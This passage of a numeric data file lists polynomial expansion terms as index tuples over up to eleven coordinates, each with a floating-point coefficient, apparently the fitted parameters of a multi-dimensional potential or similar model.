[1,1,1,2,8,9 , -5.82930908227e-11],
[1,1,1,2,10,11 , -6.60728367063e-11],
[1,1,1,3,4,6 , -5.39077212326e-12],
[1,1,1,3,4,8 , 1.82465008281e-12],
[1,1,1,3,5,11 , -9.01941524285e-13],
[1,1,1,3,6,10 , -1.99607176218e-12],
[1,1,1,3,7,11 , 2.5832147642e-14],
[1,1,1,3,8,10 , 5.70416661865e-11],
[1,1,1,3,9,11 , 5.63793374458e-11],
[1,1,1,3,11 , 1.09763164346e-09],
[1,1,2,2 , 1.79403725116e-08],
[1,1,2,2,2,2 , -3.93895168037e-11],
[1,1,2,2,3,3 , -3.27837126319e-11],
[1,1,2,2,4,4 , -5.09635225268e-12],
[1,1,2,2,4,10 , 7.1476671091e-13],
[1,1,2,2,5 , -6.81228810662e-11],
[1,1,2,2,5,5 , -2.20512713849e-12],
[1,1,2,2,5,7 , 2.29834943449e-12],
[1,1,2,2,5,9 , -3.04626517415e-12],
[1,1,2,2,6,6 , -4.71447921447e-12],
[1,1,2,2,6,8 , -3.63926215411e-12],
[1,1,2,2,7 , 6.32899030847e-11],
[1,1,2,2,7,7 , -2.27357638292e-12],
[1,1,2,2,7,9 , 5.58262355987e-13],
[1,1,2,2,8,8 , 6.03234597089e-11],
[1,1,2,2,9 , 1.16852965741e-09],
[1,1,2,2,9,9 , 5.96498730372e-11],
[1,1,2,2,10,10 , 6.76079710956e-11],
[1,1,2,2,11,11 , 6.71824454294e-11],
[1,1,2,3,4 , -4.43872093358e-11],
[1,1,2,3,4,5 , 3.72396464918e-12],
[1,1,2,3,4,7 , -3.88793608319e-12],
[1,1,2,3,4,9 , -1.84882176217e-12],
[1,1,2,3,5,10 , 1.89605633928e-12],
[1,1,2,3,6,11 , 1.86801701675e-12],
[1,1,2,3,7,10 , 5.80622117193e-14],
[1,1,2,3,8,11 , -5.90181957625e-11],
[1,1,2,3,9,10 , -5.89740171386e-11],
[1,1,2,3,10 , -1.1490035404e-09],
[1,1,3,3 , 1.33337569959e-08],
[1,1,3,3,3,3 , -2.58017086321e-11],
[1,1,3,3,4,4 , -4.61642086544e-12],
[1,1,3,3,4,10 , 1.04497217718e-12],
[1,1,3,3,5 , -7.02737001093e-12],
[1,1,3,3,5,5 , -2.41801579479e-12],
[1,1,3,3,5,7 , 2.65487771276e-12],
[1,1,3,3,5,9 , -8.16245162804e-13],
[1,1,3,3,6,6 , -5.92351824321e-12],
[1,1,3,3,6,8 , -8.50085518082e-13],
[1,1,3,3,7 , 1.95762630289e-11],
[1,1,3,3,7,7 , -3.50098548149e-12],
[1,1,3,3,7,9 , -8.11140774739e-13],
[1,1,3,3,8,8 , 5.12142641215e-11],
[1,1,3,3,9 , 9.4734277508e-10],
[1,1,3,3,9,9 , 4.94890757607e-11],
[1,1,3,3,10,10 , 5.65960896099e-11],
[1,1,3,3,11,11 , 5.64050897256e-11],
[1,1,4,4 , 3.22053287562e-09],
[1,1,4,4,4,4 , -5.45699416149e-12],
[1,1,4,4,4,10 , 5.15514754929e-13],
[1,1,4,4,5 , 1.22208382327e-11],
[1,1,4,4,5,5 , -2.26822395471e-12],
[1,1,4,4,5,7 , 2.41243241531e-12],
[1,1,4,4,5,9 , 3.02608002917e-13],
[1,1,4,4,6,6 , -5.88706245102e-12],
[1,1,4,4,6,8 , 8.20272643147e-13],
[1,1,4,4,7 , -2.60718062235e-11],
[1,1,4,4,7,7 , -2.65110124297e-12],
[1,1,4,4,7,9 , -9.62419688778e-13],
[1,1,4,4,8,8 , 1.27644107772e-11],
[1,1,4,4,9 , 2.5697899197e-10],
[1,1,4,4,9,9 , 1.25202486281e-11],
[1,1,4,4,10,10 , 1.43648327884e-11],
[1,1,4,4,11,11 , 1.43060805119e-11],
[1,1,4,5,5,10 , -5.81939326854e-13],
[1,1,4,5,6,11 , -5.40602963671e-13],
[1,1,4,5,7,10 , 8.07994156481e-14],
[1,1,4,5,8,11 , 1.09327193494e-11],
[1,1,4,5,9,10 , 1.11086015081e-11],
[1,1,4,5,10 , 2.14336131799e-10],
[1,1,4,6,6,10 , -1.1827779199e-12],
[1,1,4,6,7,11 , 4.26887803774e-14],
[1,1,4,6,8,10 , 1.6672203202e-11],
[1,1,4,6,9,11 , 1.64934244478e-11],
[1,1,4,6,11 , 3.10637904228e-10],
[1,1,4,7,7,10 , 6.4903060658e-13],
[1,1,4,7,8,11 , -1.25223219683e-11],
[1,1,4,7,9,10 , -1.2571908358e-11],
[1,1,4,7,10 , -2.44707311378e-10],
[1,1,4,8,8,10 , -2.93687192045e-12],
[1,1,4,8,9,11 , -3.06950960729e-12],
[1,1,4,8,11 , -5.43200746549e-11],
[1,1,4,9,9,10 , -3.33454650003e-12],
[1,1,4,9,10 , -6.35556412514e-11],
[1,1,4,10 , -1.85656774759e-09],
[1,1,4,10,10,10 , 4.51747875095e-13],
[1,1,4,10,11,11 , 1.47013620811e-12],
[1,1,5 , 2.86931819882e-08],
[1,1,5,5 , 2.18014815955e-10],
[1,1,5,5,5 , 6.93512413387e-12],
[1,1,5,5,5,5 , -1.18268662995e-12],
[1,1,5,5,5,7 , 6.33394245516e-13],
[1,1,5,5,5,9 , -5.57532425755e-13],
[1,1,5,5,6,6 , -1.88878812365e-12],
[1,1,5,5,6,8 , -1.09466724797e-12],
[1,1,5,5,7 , 2.10493248688e-11],
[1,1,5,5,7,7 , -1.25885894781e-12],
[1,1,5,5,7,9 , 4.69090917997e-13],
[1,1,5,5,8,8 , 7.04283429412e-12],
[1,1,5,5,9 , 1.34595276289e-10],
[1,1,5,5,9,9 , 6.76964988204e-12],
[1,1,5,5,10,10 , 8.64525065456e-12],
[1,1,5,5,11,11 , 8.01813779128e-12],
[1,1,5,6,6 , -3.7208505911e-11],
[1,1,5,6,6,7 , 2.13768870499e-12],
[1,1,5,6,6,9 , -1.61640427741e-12],
[1,1,5,6,7,8 , 9.28204900308e-13],
[1,1,5,6,8 , 1.91124710468e-10],
[1,1,5,6,8,9 , 1.12556515784e-11],
[1,1,5,6,10,11 , 1.33683322469e-11],
[1,1,5,7 , -2.0409135322e-09],
[1,1,5,7,7 , 1.48077501955e-11],
[1,1,5,7,7,7 , 7.70931074008e-13],
[1,1,5,7,7,9 , -4.41408935396e-13],
[1,1,5,7,8,8 , -8.34174797169e-12],
[1,1,5,7,9 , -1.33599834883e-10],
[1,1,5,7,9,9 , -8.26918468553e-12],
[1,1,5,7,10,10 , -9.90667370644e-12],
[1,1,5,7,11,11 , -9.50781190823e-12],
[1,1,5,8,8 , 7.48377675726e-11],
[1,1,5,8,8,9 , 2.44034863958e-12],
[1,1,5,8,10,11 , 4.2702574373e-12],
[1,1,5,9 , 1.29094195237e-09],
[1,1,5,9,9 , 6.01337031192e-11],
[1,1,5,9,9,9 , 1.82645137952e-12],
[1,1,5,9,10,10 , 4.30729655896e-12],
[1,1,5,9,11,11 , 3.87602413644e-12],
[1,1,5,10,10 , 9.41629608442e-11],
[1,1,5,11,11 , 9.14962118022e-11],
[1,1,6 , -8.85811174371e-20],
[1,1,6,6 , 2.99762881197e-09],
[1,1,6,6,6,6 , -5.99273506437e-12],
[1,1,6,6,6,8 , -2.37720661767e-12],
[1,1,6,6,7 , 3.53013532313e-11],
[1,1,6,6,7,7 , -2.53655584514e-12],
[1,1,6,6,7,9 , 1.33964363266e-12],
[1,1,6,6,8,8 , 1.65490532385e-11],
[1,1,6,6,9 , 3.13234317364e-10],
[1,1,6,6,9,9 , 1.66552488277e-11],
[1,1,6,6,10,10 , 1.98678873536e-11],
[1,1,6,6,11,11 , 1.98636205776e-11],
[1,1,6,7,7,8 , -6.45767725747e-13],
[1,1,6,7,8 , -2.3222205552e-10],
[1,1,6,7,8,9 , -1.31925318497e-11],
[1,1,6,7,10,11 , -1.57128449034e-11],
[1,1,6,8 , 2.61597838648e-09],
[1,1,6,8,8,8 , 8.16606374008e-13],
[1,1,6,8,9 , 5.6923571781e-11],
[1,1,6,8,9,9 , 5.1985854936e-13],
[1,1,6,8,10,10 , 4.17915440918e-12],
[1,1,6,8,11,11 , 3.70387201623e-12],
[1,1,6,9,10,11 , 3.77922166495e-12],
[1,1,6,10,11 , 1.11110193888e-10],
[1,1,7 , -1.02478697617e-07],
[1,1,7,7 , 2.47694961561e-10],
[1,1,7,7,7 , 4.67669317298e-11],
[1,1,7,7,7,7 , -2.66566424255e-12],
[1,1,7,7,7,9 , 2.67830433037e-13],
[1,1,7,7,8,8 , 9.75992306472e-12],
[1,1,7,7,9 , 2.07006979642e-10],
[1,1,7,7,9,9 , 9.33900691452e-12],
[1,1,7,7,10,10 , 1.22797192893e-11],
[1,1,7,7,11,11 , 1.19138074342e-11],
[1,1,7,8,8 , 3.72123159344e-11],
[1,1,7,8,8,9 , 4.52219773798e-12],
[1,1,7,8,10,11 , 1.71797501733e-12],
[1,1,7,9 , -9.19823624493e-10],
[1,1,7,9,9 , 5.67710039568e-11],
[1,1,7,9,9,9 , 7.37699752479e-12],
[1,1,7,9,10,10 , 3.3472005318e-12],
[1,1,7,9,11,11 , 2.41642330773e-12],
[1,1,7,10,10 , 2.56889116727e-12],
[1,1,7,11,11 , -5.85596911072e-12],
[1,1,8 , -9.41556530212e-19],
[1,1,8,8 , -5.38091086659e-08],
[1,1,8,8,8,8 , -1.07926745253e-10],
[1,1,8,8,9 , -2.33066063531e-09],
[1,1,8,8,9,9 , -1.04715018754e-10],
[1,1,8,8,10,10 , -1.16542011448e-10],
[1,1,8,8,11,11 , -1.16003828363e-10],
[1,1,8,9 , 3.13096133657e-20],
[1,1,8,9,10,11 , -1.17543553407e-10],
[1,1,8,10,11 , -2.65257594028e-09],
[1,1,9 , -9.36994084802e-07],
[1,1,9,9 , -5.39868089913e-08],
[1,1,9,9,9 , -2.20851315267e-09],
[1,1,9,9,9,9 , -1.0406062624e-10],
[1,1,9,9,10,10 , -1.1802461298e-10],
[1,1,9,9,11,11 , -1.15958982017e-10],
[1,1,9,10,10 , -2.66421511027e-09],
[1,1,9,11,11 , -2.60330263029e-09],
[1,1,10 , 1.00730746274e-19],
[1,1,10,10 , -6.25939336033e-08],
[1,1,10,10,10,10 , -1.27595369791e-10],
[1,1,10,10,11,11 , -1.25168303573e-10],
[1,1,10,11 , 3.74795535548e-20],
[1,1,11,11 , -6.10351679993e-08],
[1,1,11,11,11,11 , -1.2484173284e-10],
[1,2,2,2,4,11 , -7.36654601755e-13],
[1,2,2,2,5,6 , 3.12560198738e-12],
[1,2,2,2,5,8 , 3.62087158302e-12],
[1,2,2,2,6 , 1.31078248925e-10],
[1,2,2,2,6,7 , -3.38889019353e-12],
[1,2,2,2,6,9 , 4.32973409115e-12],
[1,2,2,2,7,8 , -8.67121987134e-13],
[1,2,2,2,8 , -1.21493228468e-09],
[1,2,2,2,8,9 , -6.24647119549e-11],
[1,2,2,2,10,11 , -6.91387550489e-11],
[1,2,2,3,4,6 , -5.6392363319e-12],
[1,2,2,3,4,8 , 1.60824776211e-12],
[1,2,2,3,5,11 , -2.13607245808e-12],
[1,2,2,3,6,10 , -2.25011346744e-12],
[1,2,2,3,7,11 , -3.22228852442e-13],
[1,2,2,3,8,10 , 6.07904970814e-11],
[1,2,2,3,9,11 , 6.06242389981e-11],
[1,2,2,3,11 , 1.19343244404e-09],
[1,2,3,3,4,11 , -1.04489961511e-12],
[1,2,3,3,5,6 , 3.71058915149e-12],
[1,2,3,3,5,8 , 1.04520132944e-12],
[1,2,3,3,6 , 2.59825375784e-11],
[1,2,3,3,6,7 , -4.38004194849e-12],
[1,2,3,3,6,9 , 5.35646619111e-13],
[1,2,3,3,7,8 , 1.35705018463e-12],
[1,2,3,3,8 , -1.0182186314e-09],
[1,2,3,3,8,9 , -5.25642713588e-11],
[1,2,3,3,10,11 , -5.80025072692e-11],
[1,2,4,4,4,11 , -1.03862020817e-12],
[1,2,4,4,5,6 , 3.12174904372e-12],
[1,2,4,4,5,8 , -3.0754622175e-13],
[1,2,4,4,6 , -1.12673969437e-11],
[1,2,4,4,6,7 , -3.46058127442e-12],
[1,2,4,4,6,9 , -5.90663715485e-13],
[1,2,4,4,7,8 , 9.12613410593e-13],
[1,2,4,4,8 , -2.61641531083e-10],
[1,2,4,4,8,9 , -1.37410918682e-11],
[1,2,4,4,10,11 , -1.54723469413e-11],
[1,2,4,5,5,11 , 5.89494584993e-13],
[1,2,4,5,6,10 , 8.12451832014e-13],
[1,2,4,5,7,11 , -1.68889621697e-13],
[1,2,4,5,8,10 , -1.12214122323e-11],
[1,2,4,5,9,11 , -1.12264113369e-11],
[1,2,4,5,11 , -2.12426540191e-10],
[1,2,4,6,6,11 , 8.85513423864e-13],
[1,2,4,6,7,10 , -1.64905416227e-13],
[1,2,4,6,8,11 , -1.71550685013e-11],
[1,2,4,6,9,10 , -1.71638903188e-11],
[1,2,4,6,10 , -3.24522845971e-10],
[1,2,4,7,7,11 , -5.21476521539e-13],
[1,2,4,7,8,10 , 1.28557119068e-11],
[1,2,4,7,9,11 , 1.27147070281e-11],
[1,2,4,7,11 , 2.41442897203e-10],
[1,2,4,8,8,11 , 2.24439476486e-12],
[1,2,4,8,9,10 , 2.87106470284e-12],
[1,2,4,8,10 , 5.05564631598e-11],
[1,2,4,9,9,11 , 3.27192746425e-12],
[1,2,4,9,11 , 5.84138429991e-11],
[1,2,4,10,10,11 , -1.69159483044e-12],
[1,2,4,11 , 1.17812139781e-09],
[1,2,4,11,11,11 , -1.29598109292e-12],
[1,2,5 , 2.00640929381e-20],
[1,2,5,5,5,6 , 1.07311374237e-12],
[1,2,5,5,5,8 , 1.07841652443e-12],
[1,2,5,5,6 , 3.09012902157e-11],
[1,2,5,5,6,7 , -1.36311480315e-12],
[1,2,5,5,6,9 , 1.34134579166e-12],
[1,2,5,5,7,8 , -8.2506988297e-13],
[1,2,5,5,8 , -1.28178986539e-10],
[1,2,5,5,8,9 , -7.30957507593e-12],
[1,2,5,5,10,11 , -8.75022665337e-12],
[1,2,5,6 , -1.54980137836e-09],
[1,2,5,6,6,6 , 2.67058418777e-12],
[1,2,5,6,6,8 , 1.84437417726e-12],
[1,2,5,6,7 , -3.14333591793e-11],
[1,2,5,6,7,7 , 1.60069636225e-12],
[1,2,5,6,7,9 , -1.12061485453e-12],
[1,2,5,6,8,8 , -1.12960714186e-11],
[1,2,5,6,9 , -1.91654592132e-10],
[1,2,5,6,9,9 , -1.14943828299e-11],
[1,2,5,6,10,10 , -1.35271548383e-11],
[1,2,5,6,11,11 , -1.36188054396e-11],
[1,2,5,7,7,8 , 5.0734986428e-13],
[1,2,5,7,8 , 1.4909083679e-10],
[1,2,5,7,8,9 , 8.6931228068e-12],
[1,2,5,7,10,11 , 1.03529703821e-11],
[1,2,5,8 , -2.50458248831e-09],
[1,2,5,8,8,8 , -3.3347751974e-12],
[1,2,5,8,9 , -8.35716442977e-11],
[1,2,5,8,9,9 , -2.52030020933e-12],
[1,2,5,8,10,10 , -4.99786329645e-12],
[1,2,5,8,11,11 , -4.88925723512e-12],
[1,2,5,9,10,11 , -4.6220225148e-12],
[1,2,5,10,11 , -1.13287590164e-10],
[1,2,6 , -1.59580446493e-07],
[1,2,6,6,6 , 7.26997091577e-11],
[1,2,6,6,6,7 , -3.20069009512e-12],
[1,2,6,6,6,9 , 2.72980941064e-12],
[1,2,6,6,7,8 , -1.31298556749e-12],
[1,2,6,6,8 , -3.00520221279e-10],
[1,2,6,6,8,9 , -1.74994518738e-11],
[1,2,6,6,10,11 , -2.10282145625e-11],
[1,2,6,7 , 1.98232612441e-09],
[1,2,6,7,7 , 2.77344352552e-11],
[1,2,6,7,7,7 , -1.78930962135e-12],
[1,2,6,7,7,9 , 6.21727764395e-13],
[1,2,6,7,8,8 , 1.34550557616e-11],
[1,2,6,7,9 , 2.32469724077e-10],
[1,2,6,7,9,9 , 1.35674316769e-11],
[1,2,6,7,10,10 , 1.61598362538e-11],
[1,2,6,7,11,11 , 1.61233345282e-11],
[1,2,6,8,8 , -7.77551533509e-11],
[1,2,6,8,8,9 , -1.2593025969e-12],
[1,2,6,8,10,11 , -4.39725965759e-12],
[1,2,6,9 , -3.42606449671e-09],
[1,2,6,9,9 , -6.41201425515e-11],
[1,2,6,9,9,9 , -3.87523226209e-13],
[1,2,6,9,10,10 , -4.09839222898e-12],
[1,2,6,9,11,11 , -3.87800199653e-12],
[1,2,6,10,10 , -1.2502137662e-10],
[1,2,6,11,11 , -1.15777619549e-10],
[1,2,7,7,7,8 , -3.43449645796e-13],
[1,2,7,7,8 , -1.76207518272e-10],
[1,2,7,7,8,9 , -1.01554430183e-11],
[1,2,7,7,10,11 , -1.26010113091e-11],
[1,2,7,8 , 3.67880588168e-10],
[1,2,7,8,8,8 , -4.56502341025e-12],
[1,2,7,8,9 , -5.38184191456e-11],
[1,2,7,8,9,9 , -4.89521219428e-12],
[1,2,7,8,10,10 , -2.18518338186e-12],
[1,2,7,8,11,11 , -2.30896452998e-12],
[1,2,7,9,10,11 , -2.36797681857e-12],
[1,2,7,10,11 , -1.07417622033e-11],
[1,2,8 , 9.98686931217e-07],
[1,2,8,8 , 1.77598986238e-19],
[1,2,8,8,8 , 2.449586513e-09],
[1,2,8,8,8,9 , 1.0968887389e-10],
[1,2,8,8,10,11 , 1.20108631024e-10],
[1,2,8,9 , 5.5748945162e-08],
[1,2,8,9,9 , 2.43228259569e-09],
[1,2,8,9,9,9 , 1.09217410267e-10],
[1,2,8,9,10,10 , 1.20836212919e-10],
[1,2,8,9,11,11 , 1.20768050098e-10],
[1,2,8,10,10 , 2.74510012131e-09],
[1,2,8,11,11 , 2.7444519922e-09],
[1,2,9 , -1.65655821681e-18],
[1,2,9,9 , -1.81753914454e-19],
[1,2,9,9,9 , -1.18656990919e-20],
[1,2,9,9,10,11 , 1.20527076758e-10],
[1,2,9,10,11 , 2.7468952381e-09],
[1,2,10,10 , 9.85627058888e-20],
[1,2,10,10,10,11 , 1.28981089491e-10],
[1,2,10,11 , 6.4141882172e-08],
[1,2,10,11,11,11 , 1.29173538715e-10],
[1,2,11 , -1.03814475598e-19],
[1,2,11,11 , -1.0307414895e-19],
[1,3,3,3,4,6 , -4.54259351222e-12],
[1,3,3,3,4,8 , 1.7182716099e-12],
[1,3,3,3,5,11 , -1.27051717841e-12],
[1,3,3,3,6,10 , -1.27348256298e-12],
[1,3,3,3,7,11 , -3.86586164126e-13],
[1,3,3,3,8,10 , 5.06477199073e-11],
[1,3,3,3,9,11 , 4.94429832157e-11],
[1,3,3,3,11 , 9.46564190898e-10],
[1,3,4 , 1.27650512129e-20],
[1,3,4,4,4,6 , -3.88910873786e-12],
[1,3,4,4,4,8 , 1.5070632118e-12],
[1,3,4,4,5,11 , 4.94972210235e-14],
[1,3,4,4,6,10 , 2.9149497405e-13],
[1,3,4,4,7,11 , -6.21284104241e-13],
[1,3,4,4,8,10 , 1.35441549097e-11],
[1,3,4,4,9,11 , 1.32510755087e-11],
[1,3,4,4,11 , 2.49729763937e-10],
[1,3,4,5,5,6 , -2.35329570693e-12],
[1,3,4,5,5,8 , -2.33381846023e-14],
[1,3,4,5,6 , 8.00518833898e-12],
[1,3,4,5,6,7 , 2.60285794167e-12],
[1,3,4,5,6,9 , 2.34944208414e-13],
[1,3,4,5,7,8 , -3.88060028712e-13],
[1,3,4,5,8 , 1.88321791037e-10],
[1,3,4,5,8,9 , 1.00333150385e-11],
[1,3,4,5,10,11 , 1.09849868227e-11],
[1,3,4,6 , 3.49767462675e-09],
[1,3,4,6,6,6 , -5.51089462162e-12],
[1,3,4,6,6,8 , 2.20430447397e-13],
[1,3,4,6,7 , -4.57674274156e-12],
[1,3,4,6,7,7 , -3.10856259095e-12],
[1,3,4,6,7,9 , -7.38342314311e-13],
[1,3,4,6,8,8 , 1.51966123374e-11],
[1,3,4,6,9 , 2.75679298464e-10],
[1,3,4,6,9,9 , 1.48869623775e-11],
[1,3,4,6,10,10 , 1.67781984762e-11],
[1,3,4,6,11,11 , 1.67101742053e-11],
[1,3,4,7,7,8 , 1.06800519045e-12],
[1,3,4,7,8 , -2.15010269225e-10],
[1,3,4,7,8,9 , -1.11715931694e-11],
[1,3,4,7,10,11 , -1.25918287089e-11],
[1,3,4,8 , -2.22287452308e-09],
[1,3,4,8,8,8 , -4.03260851636e-12],
[1,3,4,8,9 , -9.78332362538e-11],
[1,3,4,8,9,9 , -4.9956317244e-12],
[1,3,4,8,10,10 , -7.94804766617e-13],
[1,3,4,8,11,11 , -6.31475290286e-13],
[1,3,4,9,10,11 , -1.16298393516e-12],
[1,3,4,10,11 , -1.10918887312e-11],
[1,3,5,5,5,11 , -5.69219350358e-13],
[1,3,5,5,6,10 , -8.40580131201e-13],
[1,3,5,5,7,11 , 4.89780460184e-13],
[1,3,5,5,8,10 , 7.77803266415e-12],
[1,3,5,5,9,11 , 7.65169689643e-12],
[1,3,5,5,11 , 1.43441262502e-10],
[1,3,5,6,6,11 , -1.16855855659e-12],
[1,3,5,6,7,10 , 5.06867428584e-13],
[1,3,5,6,8,11 , 1.19783320362e-11],
[1,3,5,6,9,10 , 1.20010056332e-11],
[1,3,5,6,10 , 2.2559879313e-10],
[1,3,5,7,7,11 , -6.43671765447e-14],
[1,3,5,7,8,10 , -9.14195303941e-12],
[1,3,5,7,9,11 , -9.06909767248e-12],
[1,3,5,7,11 , -1.68796533885e-10],
[1,3,5,8,8,11 , 2.50895354465e-12],
[1,3,5,8,9,10 , 2.3378450217e-12],
[1,3,5,8,10 , 6.58657851272e-11],
[1,3,5,9,9,11 , 2.22578471483e-12],
[1,3,5,9,11 , 6.16752857166e-11],
[1,3,5,10,10,11 , 5.08747340217e-12],
[1,3,5,11 , 1.32703569983e-09],
[1,3,5,11,11,11 , 5.64342803122e-12],
[1,3,6,6,6,10 , -1.52432630122e-12],
[1,3,6,6,7,11 , 5.2019354392e-13],
[1,3,6,6,8,10 , 1.85390564765e-11],
[1,3,6,6,9,11 , 1.83272649746e-11],
[1,3,6,6,11 , 3.51823463318e-10],
[1,3,6,7,7,10 , 2.53629690321e-13],
[1,3,6,7,8,11 , -1.43020450214e-11],
[1,3,6,7,9,10 , -1.40495191675e-11],
[1,3,6,7,10 , -2.75552233737e-10],
[1,3,6,8,8,10 , 1.54528673866e-12],
[1,3,6,8,9,11 , 1.07657701048e-12],
[1,3,6,8,11 , 6.10553997346e-11],
[1,3,6,9,9,10 , 4.81355130617e-13],
[1,3,6,9,10 , 4.96306795269e-11],
[1,3,6,10 , 2.44274424429e-09],
[1,3,6,10,10,10 , 5.37756139995e-12],
[1,3,6,10,11,11 , 5.24141574358e-12],
[1,3,7,7,7,11 , -2.79882544901e-13],
[1,3,7,7,8,10 , 1.0752517575e-11],
[1,3,7,7,9,11 , 1.07609720445e-11],
[1,3,7,7,11 , 2.24107388266e-10],
[1,3,7,8,8,11 , 4.10608136469e-12],
[1,3,7,8,9,10 , 3.96173899458e-12],
[1,3,7,8,10 , 4.9516911862e-11],
[1,3,7,9,9,11 , 4.34174558987e-12],
[1,3,7,9,11 , 4.75889708362e-11],
[1,3,7,10,10,11 , 1.23162850532e-12],
[1,3,7,11 , -1.15314515924e-09],
[1,3,7,11,11,11 , 1.86585922509e-12],
[1,3,8 , -9.53441461253e-20],
[1,3,8,8,8,10 , -1.07164775663e-10],
[1,3,8,8,9,11 , -1.07153946353e-10],
[1,3,8,8,11 , -2.41830978146e-09],
[1,3,8,9 , -1.11685926307e-20],
[1,3,8,9,9,10 , -1.06716195113e-10],
[1,3,8,9,10 , -2.40870402771e-09],
[1,3,8,10 , -5.50978326589e-08],
[1,3,8,10,10,10 , -1.16530589495e-10],
[1,3,8,10,11,11 , -1.15663853912e-10],
[1,3,8,11 , -2.74458527245e-20],
[1,3,9,9,9,11 , -1.07127837937e-10],
[1,3,9,9,11 , -2.3819983181e-09],
[1,3,9,10 , 6.31626843939e-20],
[1,3,9,10,10,11 , -1.16541412781e-10],
[1,3,9,11 , -5.45127959763e-08],
[1,3,9,11,11,11 , -1.16481154256e-10],
[1,3,10 , -4.67721005562e-19],
[1,3,10,10,11 , -2.63215349738e-09],
[1,3,11 , -9.83601348706e-07],
[1,3,11,11,11 , -2.63231943333e-09],
[1,4 , -1.35315729904e-20],
[1,6 , -2.05150675051e-20],
[1,11 , 5.08968712059e-20],
[2,2 , 1.93880557094e-05],
[2,2,2,2 , 2.03665082571e-08],
[2,2,2,2,2,2 , -4.34128340472e-11],
[2,2,2,2,3,3 , -3.2577770838e-11],
[2,2,2,2,4,4 , -5.7323562667e-12],
[2,2,2,2,4,10 , 2.61317612065e-13],
[2,2,2,2,5 , -1.13900075879e-10],
[2,2,2,2,5,5 , -2.26376153596e-12],
[2,2,2,2,5,7 , 2.19343993924e-12],
[2,2,2,2,5,9 , -4.66689440431e-12],
[2,2,2,2,6,6 , -4.49389067013e-12],
[2,2,2,2,6,8 , -5.28347404225e-12],
[2,2,2,2,7 , 8.15813438077e-11],
[2,2,2,2,7,7 , -2.80503957612e-12],
[2,2,2,2,7,9 , 1.33665508298e-12],
[2,2,2,2,8,8 , 6.45615036783e-11],
[2,2,2,2,9 , 1.28705965078e-09],
[2,2,2,2,9,9 , 6.26891836187e-11],
[2,2,2,2,10,10 , 7.09874679482e-11],
[2,2,2,2,11,11 , 7.10016256016e-11],
[2,2,2,3,4 , -4.76386101873e-11],
[2,2,2,3,4,5 , 3.53494384308e-12],
[2,2,2,3,4,7 , -3.67150707437e-12],
[2,2,2,3,4,9 , -2.31598086823e-12],
[2,2,2,3,5,10 , 2.28413847637e-12],
[2,2,2,3,6,11 , 2.54206686235e-12],
[2,2,2,3,7,10 , 1.39919592991e-13],
[2,2,2,3,8,11 , -6.25174921617e-11],
[2,2,2,3,9,10 , -6.10595608783e-11],
[2,2,2,3,10 , -1.18688551723e-09],
[2,2,3,3 , 1.32276604419e-08],
[2,2,3,3,3,3 , -2.64132897938e-11],
[2,2,3,3,4,4 , -4.39626014171e-12],
[2,2,3,3,4,10 , 1.37998623894e-12],
[2,2,3,3,5 , -2.0279415992e-11],
[2,2,3,3,5,5 , -2.39956500505e-12],
[2,2,3,3,5,7 , 2.60190436798e-12],
[2,2,3,3,5,9 , -1.09309346709e-12],
[2,2,3,3,6,6 , -5.8707082097e-12],
[2,2,3,3,6,8 , -1.27641446462e-12],
[2,2,3,3,7 , 2.64032431753e-11],
[2,2,3,3,7,7 , -3.54560736521e-12],
[2,2,3,3,7,9 , -8.24299214542e-13],
[2,2,3,3,8,8 , 5.44632540641e-11],
[2,2,3,3,9 , 9.95614876534e-10],
[2,2,3,3,9,9 , 5.24703720982e-11],
[2,2,3,3,10,10 , 5.87051304326e-11],
[2,2,3,3,11,11 , 6.03281134374e-11],
[2,2,4,4 , 2.98368300036e-09],
[2,2,4,4,4,4 , -4.40035547203e-12],
[2,2,4,4,4,10 , 1.01583060619e-12],
[2,2,4,4,5 , 1.79216973139e-11],
[2,2,4,4,5,5 , -2.32023552859e-12],
[2,2,4,4,5,7 , 2.20314864417e-12],
[2,2,4,4,5,9 , 4.66456246392e-13],
[2,2,4,4,6,6 , -5.49629027458e-12],
[2,2,4,4,6,8 , 5.29694269396e-13],
[2,2,4,4,7 , -1.66542688018e-11],
[2,2,4,4,7,7 , -2.44364590061e-12],
[2,2,4,4,7,9 , -9.83458049893e-13],
[2,2,4,4,8,8 , 1.39679999714e-11],
[2,2,4,4,9 , 2.63776985056e-10],
[2,2,4,4,9,9 , 1.33947417408e-11],
[2,2,4,4,10,10 , 1.51941893951e-11],
[2,2,4,4,11,11 , 1.53328495516e-11],
[2,2,4,5,5,10 , -4.7353037045e-13],
[2,2,4,5,6,11 , -8.41719573405e-13],
[2,2,4,5,7,10 , 4.4237018209e-14],
[2,2,4,5,8,11 , 1.15551325391e-11],
[2,2,4,5,9,10 , 1.12240638585e-11],
[2,2,4,5,10 , 2.06659959459e-10],
[2,2,4,6,6,10 , -8.46156670673e-13],
[2,2,4,6,7,11 , 1.01405653082e-13],
[2,2,4,6,8,10 , 1.75046075186e-11],
[2,2,4,6,9,11 , 1.77044928628e-11],
[2,2,4,6,11 , 3.32344393329e-10],
[2,2,4,7,7,10 , 5.76356939694e-13],
[2,2,4,7,8,11 , -1.33113184184e-11],
[2,2,4,7,9,10 , -1.2825603432e-11],
[2,2,4,7,10 , -2.37347847599e-10],
[2,2,4,8,8,10 , -2.36991413442e-12],
[2,2,4,8,9,11 , -2.48719660723e-12],
[2,2,4,8,11 , -3.51348649817e-11],
[2,2,4,9,9,10 , -3.28159223977e-12],
[2,2,4,9,10 , -5.24334508686e-11],
[2,2,4,10 , -7.75838292784e-10],
[2,2,4,10,10,10 , 1.34153278504e-12],
[2,2,4,10,11,11 , 2.01193638322e-12],
[2,2,5 , 1.0559999733e-07],
[2,2,5,5 , 9.75860004004e-10],
[2,2,5,5,5 , -2.97163298548e-11],
[2,2,5,5,5,5 , -5.83793199047e-13],
[2,2,5,5,5,7 , 7.34700838556e-13],
[2,2,5,5,5,9 , -1.22747438827e-12],
[2,2,5,5,6,6 , -1.65289325033e-12],
[2,2,5,5,6,8 , -1.41127250437e-12],
[2,2,5,5,7 , 2.06171268138e-11],
[2,2,5,5,7,7 , -9.58325327059e-13],
[2,2,5,5,7,9 , 9.91231276663e-13],
[2,2,5,5,8,8 , 7.20735453259e-12],
[2,2,5,5,9 , 1.27583876597e-10],
[2,2,5,5,9,9 , 6.96778797281e-12],
[2,2,5,5,10,10 , 8.3251532747e-12],
[2,2,5,5,11,11 , 8.74477996753e-12],
[2,2,5,6,6 , -4.6422604917e-11],
[2,2,5,6,6,7 , 1.9746892107e-12],
[2,2,5,6,6,9 , -1.92578422362e-12],
[2,2,5,6,7,8 , 1.11385966081e-12],
[2,2,5,6,8 , 1.8740568569e-10],
